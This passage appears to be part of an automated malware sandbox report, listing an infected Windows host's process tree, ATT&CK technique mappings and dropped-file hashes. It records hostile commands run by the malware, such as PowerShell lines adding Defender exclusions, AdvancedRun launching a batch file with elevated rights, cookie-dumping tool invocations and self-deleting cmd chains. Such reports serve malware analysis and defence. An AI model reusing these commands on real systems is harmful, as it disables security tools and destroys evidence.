                                                                                            • Executes dropped EXE
                                                                                            PID:2300
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2800
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1728
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                              PID:672
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                          1⤵
                                                                                            PID:1880
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                            1⤵
                                                                                              PID:1440
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                              1⤵
                                                                                                PID:1284
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                1⤵
                                                                                                  PID:1244
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                  1⤵
                                                                                                    PID:1088
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    PID:296
                                                                                                    • C:\Users\Admin\AppData\Roaming\hwwtgtv
                                                                                                      C:\Users\Admin\AppData\Roaming\hwwtgtv
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:4640
                                                                                                      • C:\Users\Admin\AppData\Roaming\hwwtgtv
                                                                                                        C:\Users\Admin\AppData\Roaming\hwwtgtv
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:5152
                                                                                                    • C:\Users\Admin\AppData\Roaming\frwtgtv
                                                                                                      C:\Users\Admin\AppData\Roaming\frwtgtv
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:5712
                                                                                                    • C:\Users\Admin\AppData\Roaming\hwwtgtv
                                                                                                      C:\Users\Admin\AppData\Roaming\hwwtgtv
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:4940
                                                                                                      • C:\Users\Admin\AppData\Roaming\hwwtgtv
                                                                                                        C:\Users\Admin\AppData\Roaming\hwwtgtv
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:4732
                                                                                                    • C:\Users\Admin\AppData\Roaming\frwtgtv
                                                                                                      C:\Users\Admin\AppData\Roaming\frwtgtv
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:4624
                                                                                                    • C:\Users\Admin\AppData\Roaming\hwwtgtv
                                                                                                      C:\Users\Admin\AppData\Roaming\hwwtgtv
                                                                                                      2⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:1004
                                                                                                      • C:\Users\Admin\AppData\Roaming\hwwtgtv
                                                                                                        C:\Users\Admin\AppData\Roaming\hwwtgtv
                                                                                                        3⤵
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        PID:5372
                                                                                                    • C:\Users\Admin\AppData\Roaming\frwtgtv
                                                                                                      C:\Users\Admin\AppData\Roaming\frwtgtv
                                                                                                      2⤵
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      PID:816
                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll",HjhHaWQ
                                                                                                      2⤵
                                                                                                      • Windows security modification
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:2140
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                    1⤵
                                                                                                      PID:348
                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                      1⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1612
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                        2⤵
                                                                                                        • Checks processor information in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:3056
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                        2⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Checks processor information in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Modifies registry class
                                                                                                        PID:2192
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                      1⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4740
                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      PID:4852
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4816
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      • Modifies registry class
                                                                                                      PID:5036
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:5724
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:5680
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                      1⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:5444
                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      PID:6124
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:5164
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:4776
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:2368
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\55D8.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\55D8.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4420
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5992.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\5992.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      PID:2664
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5992.exe"
                                                                                                        2⤵
                                                                                                          PID:2600
                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                            timeout /T 10 /NOBREAK
                                                                                                            3⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:5276
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5B58.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\5B58.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Windows security modification
                                                                                                        • Adds Run key to start application
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:4440
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\aad1f63c-27d2-44f8-adeb-1df6075be2c2\AdvancedRun.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\aad1f63c-27d2-44f8-adeb-1df6075be2c2\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\aad1f63c-27d2-44f8-adeb-1df6075be2c2\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5104
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\aad1f63c-27d2-44f8-adeb-1df6075be2c2\AdvancedRun.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\aad1f63c-27d2-44f8-adeb-1df6075be2c2\AdvancedRun.exe" /SpecialRun 4101d8 5104
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5488
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\5B58.exe" -Force
                                                                                                          2⤵
                                                                                                            PID:5528
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5B58.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\5B58.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5316
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5E95.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\5E95.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Windows security modification
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:5396
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\c2b87e40-6e11-45c3-9cee-ba9b68423e10\AdvancedRun.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\c2b87e40-6e11-45c3-9cee-ba9b68423e10\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c2b87e40-6e11-45c3-9cee-ba9b68423e10\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:1192
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\c2b87e40-6e11-45c3-9cee-ba9b68423e10\AdvancedRun.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\c2b87e40-6e11-45c3-9cee-ba9b68423e10\AdvancedRun.exe" /SpecialRun 4101d8 1192
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4544
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\5E95.exe" -Force
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Adds Run key to start application
                                                                                                            PID:3352
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5E95.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\5E95.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:5320
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5292
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:5660
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:3284
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:5432
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:4656
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:4704
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:4492
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe
                                                                                                                    1⤵
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:5348
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:6112
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                      1⤵
                                                                                                                        PID:4260
                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                        1⤵
                                                                                                                          PID:1460
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C5AC.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\C5AC.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Checks processor information in registry
                                                                                                                          PID:5280
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im C5AC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C5AC.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                            2⤵
                                                                                                                              PID:4444
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im C5AC.exe /f
                                                                                                                                3⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:5384
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout /t 6
                                                                                                                                3⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:1156
                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                            1⤵
                                                                                                                            • Modifies registry class
                                                                                                                            PID:4592
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                            1⤵
                                                                                                                              PID:2860
                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                              1⤵
                                                                                                                                PID:3968

                                                                                                                              Network

                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                              Persistence

                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                              1
                                                                                                                              T1060

                                                                                                                              BITS Jobs

                                                                                                                              1
                                                                                                                              T1197

                                                                                                                              Defense Evasion

                                                                                                                              Disabling Security Tools

                                                                                                                              3
                                                                                                                              T1089

                                                                                                                              Modify Registry

                                                                                                                              6
                                                                                                                              T1112

                                                                                                                              BITS Jobs

                                                                                                                              1
                                                                                                                              T1197

                                                                                                                              Install Root Certificate

                                                                                                                              1
                                                                                                                              T1130

                                                                                                                              Credential Access

                                                                                                                              Credentials in Files

                                                                                                                              5
                                                                                                                              T1081

                                                                                                                              Discovery

                                                                                                                              Software Discovery

                                                                                                                              1
                                                                                                                              T1518

                                                                                                                              Query Registry

                                                                                                                              4
                                                                                                                              T1012

                                                                                                                              System Information Discovery

                                                                                                                              5
                                                                                                                              T1082

                                                                                                                              Security Software Discovery

                                                                                                                              1
                                                                                                                              T1063

                                                                                                                              Peripheral Device Discovery

                                                                                                                              1
                                                                                                                              T1120

                                                                                                                              Remote System Discovery

                                                                                                                              1
                                                                                                                              T1018

                                                                                                                              Collection

                                                                                                                              Data from Local System

                                                                                                                              5
                                                                                                                              T1005

                                                                                                                              Command and Control

                                                                                                                              Web Service

                                                                                                                              1
                                                                                                                              T1102

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                MD5

                                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                SHA1

                                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                SHA256

                                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                SHA512

                                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                MD5

                                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                SHA1

                                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                SHA256

                                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                SHA512

                                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                              • C:\Program Files\Windows Security\CQBXVJEPUK\ultramediaburner.exe
                                                                                                                                MD5

                                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                SHA1

                                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                SHA256

                                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                SHA512

                                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                              • C:\Program Files\Windows Security\CQBXVJEPUK\ultramediaburner.exe
                                                                                                                                MD5

                                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                SHA1

                                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                SHA256

                                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                SHA512

                                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                              • C:\Program Files\install.dat
                                                                                                                                MD5

                                                                                                                                806c3221a013fec9530762750556c332

                                                                                                                                SHA1

                                                                                                                                36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                SHA256

                                                                                                                                9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                SHA512

                                                                                                                                56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                              • C:\Program Files\install.dat
                                                                                                                                MD5

                                                                                                                                bef5c483c6eba257020201190666e28d

                                                                                                                                SHA1

                                                                                                                                e7f5cda41f731eea23bc45c0a6c06ad91f1d7df8

                                                                                                                                SHA256

                                                                                                                                d42b23175385ccc042ffebd37cc0f25847c790fb6f98bad0cd024f70f85b3fce

                                                                                                                                SHA512

                                                                                                                                302bca91e431e388f7bcff837ab6b7be23a9a38026410589e4ae3c86be057039117897429b5664eccee8a6871904f8e44629acf7d837cece8c701fb6915fdf90

                                                                                                                              • C:\Program Files\install.dll
                                                                                                                                MD5

                                                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                SHA1

                                                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                SHA256

                                                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                SHA512

                                                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                              • C:\Program Files\install.dll
                                                                                                                                MD5

                                                                                                                                c6a2e4e23319dec9d56f8029ef834e83

                                                                                                                                SHA1

                                                                                                                                299e80473cbe56b596a2d4d38aea0aab46826167

                                                                                                                                SHA256

                                                                                                                                6ae4bd10f8bc7f3e5856c7f3571d165787f48d23f95ccfa823a5dab74f7fd554

                                                                                                                                SHA512

                                                                                                                                2a30529c2254ff481ab099032829d1b533d8bb6fca6a766d04e3febd6dc87ba34852eb7354ffc8d0ed7f584b5bff587e2b549c4f4c9150e98a2ff6a0f751438a

                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                MD5

                                                                                                                                42fbe27fe5b75693fc168d59b745a4b0

                                                                                                                                SHA1

                                                                                                                                231ff67f8bc103bb5e00a005ec3e74d5186b7c99

                                                                                                                                SHA256

                                                                                                                                fcbff3c6332a9e966a2e2b13734a12924eca9faa8ee4d5c3a17e36e5af110774

                                                                                                                                SHA512

                                                                                                                                8c45cf290f79b03e40548b450f61db9404e5efdd986193930b92ea4bce97280eee51d79199fe622dd7c77a15890c380e32d561e5c379941699964d059f3e8b75

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\6GPGSFG3.cookie
                                                                                                                                MD5

                                                                                                                                2660fb15cbd27da59a4f55312a53a570

                                                                                                                                SHA1

                                                                                                                                260edba75a22b68dac53f43c967d3ead1779250a

                                                                                                                                SHA256

                                                                                                                                df3741f73db89588ebe58d9bd1e640aa365880c0ac23691d05a7cce592d4a9ac

                                                                                                                                SHA512

                                                                                                                                d7eabb999468e33c615307f1b1260996a29960fbf208839559ef1571f6002ee2089a63c225d0f8967bca11f83b424bd01de73642a033e27245be6a55de103738

                                                                                                                              • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log
                                                                                                                                MD5

                                                                                                                                b5518fd699729c42d5fe62062612ef6b

                                                                                                                                SHA1

                                                                                                                                d5fe101cd06a3d922f388ff62c0c42c0879a67fa

                                                                                                                                SHA256

                                                                                                                                0c1e67fe0ffac15ae890bce462d2c4b4058673d44665c172d88155e9988a21b3

                                                                                                                                SHA512

                                                                                                                                9a6e6089d793d3e630e49d1d4d5b999b3bbd1e6340a831500a8bfe5edbf8fa5162e52ce5cdb0699fd66952248f827d7d554611795fcdef1428c3b2d06198fa25

                                                                                                                              • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\edb.chk
                                                                                                                                MD5

                                                                                                                                8670b1bde11bd2d968470539f0b7961b

                                                                                                                                SHA1

                                                                                                                                bfbe899f5cd2dfc8bf505b1eda08c038df1a1636

                                                                                                                                SHA256

                                                                                                                                ea30819cd3a09d88af8f3f1cff29c56621ae191f3f6f7e1c1d76e2f7e2cfc15d

                                                                                                                                SHA512

                                                                                                                                11748984bf2c28e04917b748fe55a5de07b6978a2f84ed3b0f4f3116baaa27c52a6a984902e2272627caa85130c8ae979dc8757eb0af2afb43d14a826688ead4

                                                                                                                              • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb
                                                                                                                                MD5

                                                                                                                                b3a55c93156aaa013e52e7bfcb6db1a8

                                                                                                                                SHA1

                                                                                                                                e637e8790b3d6ae89ed9db1d120c47f02c4845a7

                                                                                                                                SHA256

                                                                                                                                76f7c6c5910497d710fbc39d38b158722f946e93d24487540037a7486b66956c

                                                                                                                                SHA512

                                                                                                                                bd9b447970c65195ec31a3fbb021069dcad70c2165a161b1d24c066bd20596dbf2e9d555b60e7c00ad706ff115a36f76225b4e270e3365223ec794b675fb33c6

                                                                                                                              • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm
                                                                                                                                MD5

                                                                                                                                618d7a735e9bded26a531c7b8b97ef3c

                                                                                                                                SHA1

                                                                                                                                a174eb5ae9f9c1484c1f5d42f113ced3139cf076

                                                                                                                                SHA256

                                                                                                                                e445fde0ac4582ebaebdb7519e7656acc071cfbbca7caa36ff95a501a169a6ef

                                                                                                                                SHA512

                                                                                                                                1ab6efbf70640a6c0a1151a08b0f71e4ad30b359af4904b02c38bde251b0f0c401992430b93fee4e7bc3bb33c5a9d51ff65ae6fd29c5acde4aa17b5659c0b20c

